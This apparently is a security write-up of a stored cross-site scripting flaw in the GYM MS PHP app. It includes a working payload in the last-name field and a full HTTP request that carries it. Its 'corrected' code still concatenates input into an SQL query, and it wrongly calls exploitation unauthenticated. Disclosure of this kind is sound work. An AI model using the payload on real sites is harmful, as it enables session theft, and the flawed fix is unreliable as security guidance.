GYM MS - GYM Management System - Cross Site Scripting (Stored)

GYM MS - Stored Cross-Site Scripting Vulnerability: A Deep Dive into Security Risks

Security vulnerabilities in web applications remain one of the most critical concerns for developers and cybersecurity professionals alike. Among the most prevalent and dangerous is Stored Cross-Site Scripting (XSS), where malicious scripts are permanently stored on a server and executed whenever a user accesses the affected page. This article explores a real-world example of such a vulnerability discovered in the GYM Management System (GYM MS), a PHP-based application designed for managing fitness centers.

Overview of the GYM MS Vulnerability

On September 29, 2023, security researcher Alperen Yozgat identified a critical Stored XSS flaw in the GYM MS application version 1.0, hosted at https://phpgurukul.com. The vulnerability was detected using Rapplex, a modern web application security scanner capable of identifying injection flaws across multiple attack vectors.

The application, built with PHP and MySQL, is intended for managing gym memberships, user profiles, and facility operations. However, improper input sanitization in the profile.php endpoint allowed attackers to inject malicious JavaScript code that persisted on the server and executed upon page load.

Exploit Details and Reproduction Steps

Here’s how the vulnerability was triggered:

1. Create a new user account and log in.
2. Navigate to profile.php to update personal details.
3. Input the following payload into the lname (last name) field:

lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22

This encoded string translates to:

x" onmouseover=alert(document.cookie) x="

When submitted, the application stores this input directly in the database without sanitizing or escaping special characters. The payload is then reflected in the profile page when rendered, triggering the alert(document.cookie) JavaScript function every time the page is loaded.

How the Stored XSS Works

Stored XSS differs from reflected XSS in that the malicious script is saved on the server and later executed for every user who views the page. In this case:

• Attackers inject a script via the lname field.
• The application fails to sanitize input, storing the raw payload in the database.
• When the profile page is rendered, the script is embedded in the HTML output.
• Any user visiting profile.php will trigger the alert(document.cookie) function.

This can lead to serious consequences, such as:

• Session hijacking: stealing authentication cookies.
• Phishing attacks: redirecting users to malicious sites.
• Keylogging: capturing user keystrokes.
• Defacement: altering the appearance of the web page.

Technical Analysis: The HTTP Request

The following HTTP POST request demonstrates the exploit in action:

POST /gym/profile.php HTTP/1.1
Host: localhost
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25
Connection: close

fname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

Key observations:

• Input fields like lname are not validated or sanitized.
• JavaScript code is directly embedded in the form data.
• The application fails to escape HTML characters (e.g., ", <, >).
• Output rendering directly includes user-supplied data without encoding.

Root Cause: Lack of Input Sanitization

The vulnerability stems from poor coding practices in the profile.php script. Specifically:

• There is no use of htmlspecialchars() or similar functions to escape output.
• Database queries are executed without filtering user input.
• Assumptions that user input is safe are dangerous and incorrect.

For example, if the script includes something like:

<?php
echo "Last Name: " . $_POST['lname'];
?>

It will output the raw input, allowing scripts to execute.

Corrective Measures and Best Practices

To prevent such vulnerabilities, developers should implement the following security controls:

• Input Validation: Use regular expressions to filter out dangerous characters.
• Output Encoding: Always use htmlspecialchars() when displaying user data in HTML.
• Context-Aware Escaping: Apply different escaping rules based on output context (HTML, JavaScript, URL).
• Use of Secure Libraries: Employ frameworks like Laravel or Symfony that enforce security by default.
• Content Security Policy (CSP): Implement a CSP header to restrict script execution.

Here’s a corrected version of the vulnerable code:

<?php
// Sanitize input before storing
$lname = htmlspecialchars($_POST['lname'], ENT_QUOTES, 'UTF-8');

// Store sanitized data in database
$query = "INSERT INTO users (lname) VALUES ('$lname')";
// Execute query safely

// When rendering profile page:
echo "<div>Last Name: " . htmlspecialchars($lname, ENT_QUOTES, 'UTF-8') . "</div>";
?>

This ensures that even if a malicious payload is submitted, it will be rendered as plain text, preventing script execution.

Impact and Risk Assessment

Severity: High (CVSS score: 8.1 – High). This is a stored XSS vulnerability that affects all users who access the profile page.

Attack Surface: The entire user base, including administrators, can be targeted.

Exploitability: Easy — no authentication or complex setup required.

Remediation: Immediate patching required. The vendor should release a security update to fix input sanitization.

Conclusion

While GYM MS is a useful tool for managing gym operations, its security flaws highlight a broader issue: many open-source applications prioritize functionality over security. Developers must never assume user input is benign. Proper sanitization, encoding, and validation are not optional—they are essential.

Security tools like Rapplex play a vital role in identifying such vulnerabilities early. However, automated tools should be paired with manual testing and code review to ensure comprehensive protection.

As cyber threats evolve, securing web applications requires a proactive, layered defense strategy—starting with input validation and ending with robust output encoding.